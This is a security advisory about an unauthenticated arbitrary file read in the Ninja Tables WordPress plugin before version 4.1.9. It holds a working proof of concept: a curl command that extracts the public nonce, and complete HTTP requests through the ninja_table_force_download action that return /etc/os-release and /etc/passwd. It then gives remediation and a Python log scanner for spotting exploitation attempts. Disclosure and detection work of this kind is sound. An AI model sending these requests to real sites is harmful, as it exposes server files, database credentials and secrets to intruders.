Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read [LFI]

Critical Severity. Published by Muhammad Waseem, Security Research.

This comprehensive security research details a critical vulnerability discovered in the Ninja Tables WordPress plugin that allows unauthenticated attackers to read arbitrary files from the target server.

Vulnerability Details: Unauthenticated Arbitrary File Read via `ninja_table_force_download`

CVE: Pending Assignment

CVSS Score: 7.5 (High)

Affected Versions: Ninja Tables < 4.1.9

Vulnerability Type: Local File Inclusion (LFI)


The Ninja Tables plugin for WordPress contains a critical vulnerability in the AJAX action `ninja_table_force_download`. The vulnerability stems from insufficient input validation of the `url` parameter, which allows unauthenticated attackers to traverse the file system and read arbitrary files from the server.

Attackers can exploit this vulnerability to access sensitive files including system configuration files (`/etc/passwd`, `/etc/os-release`), application configuration files (`wp-config.php`), environment variables (`.env`), and application logs.


Proof of Concept (PoC) Steps

1. Extract the Nonce

First, we need to extract the public nonce from the target website's source code:


curl -s https://target.com | grep -oP '"ninja_table_public_nonce":"\K[a-z0-9]+'

Expected output:

3d22ded27c
(Screenshot: nonce extraction example)

2. Read `/etc/os-release`

HTTP Request

GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/os-release&ninja_table_public_nonce=3d22ded27c HTTP/2
Host: redacted.com
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Server Response

HTTP/2 200 OK
content-type: application/octet-stream

NAME="Ubuntu"
PRETTY_NAME="Ubuntu 22.04.4 LTS"
ID=ubuntu
...

3. Read `/etc/passwd`

(Screenshot: reading the /etc/passwd file)

HTTP Request

GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/passwd&ninja_table_public_nonce=3d22ded27c HTTP/2
Host: redacted.com
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Server Response

HTTP/2 200 OK
content-type: application/octet-stream

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Security Impact

  • Unauthenticated Local File Read
  • Disclosure of sensitive server files (/etc/passwd, /wp-config.php, .env, logs)
  • May lead to database credential leakage, full site compromise, or privilege escalation

Remediation

Update the Ninja Tables plugin to version 4.1.9 or later, in which this issue is patched.
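Until every site is updated, defenders can look for exploitation attempts in web server access logs. The following is an added detection example, not code from the advisory or the plugin: it parses combined-format log lines (constructed sample data below), isolates requests to admin-ajax.php with `action=ninja_table_force_download`, and flags any `url` parameter that is an absolute filesystem path or contains a `..` traversal segment, decoding percent-encoding first so `%2e%2e%2f` variants are not missed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/passwd&ninja_table_public_nonce=3d22ded27c HTTP/2.0" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2025:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=..%2F..%2Fwp-config.php&ninja_table_public_nonce=3d22ded27c HTTP/2.0" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=https://example.com/wp-content/uploads/ninja-tables/export.csv&ninja_table_public_nonce=3d22ded27c HTTP/2.0" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2025:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_tables_get_data&table_id=3 HTTP/2.0" 200 900 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def is_suspicious_url_param(value: str) -> bool:
    """True when the decoded url parameter is an absolute path or climbs with '..'."""
    decoded = unquote(unquote(value))            # tolerate single and double percent-encoding
    if decoded.startswith(("/", "\\")):          # absolute filesystem path, e.g. /etc/passwd
        return True
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments                      # any traversal segment

def scan_log(text: str):
    """Return (ip, status, decoded url) for each force_download request that looks like LFI."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("path"))
        if not target.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(target.query)          # parse_qs already decodes one level
        if params.get("action", [""])[0] != "ninja_table_force_download":
            continue
        url_param = params.get("url", [""])[0]
        if is_suspicious_url_param(url_param):
            hits.append((m.group("ip"), m.group("status"), unquote(url_param)))
    return hits

if __name__ == "__main__":
    for ip, status, path in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} url={path}")
```

A 200 status with `content-type: application/octet-stream` on a flagged request is a strong indicator the file was actually served, so prioritise those hits for incident response.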

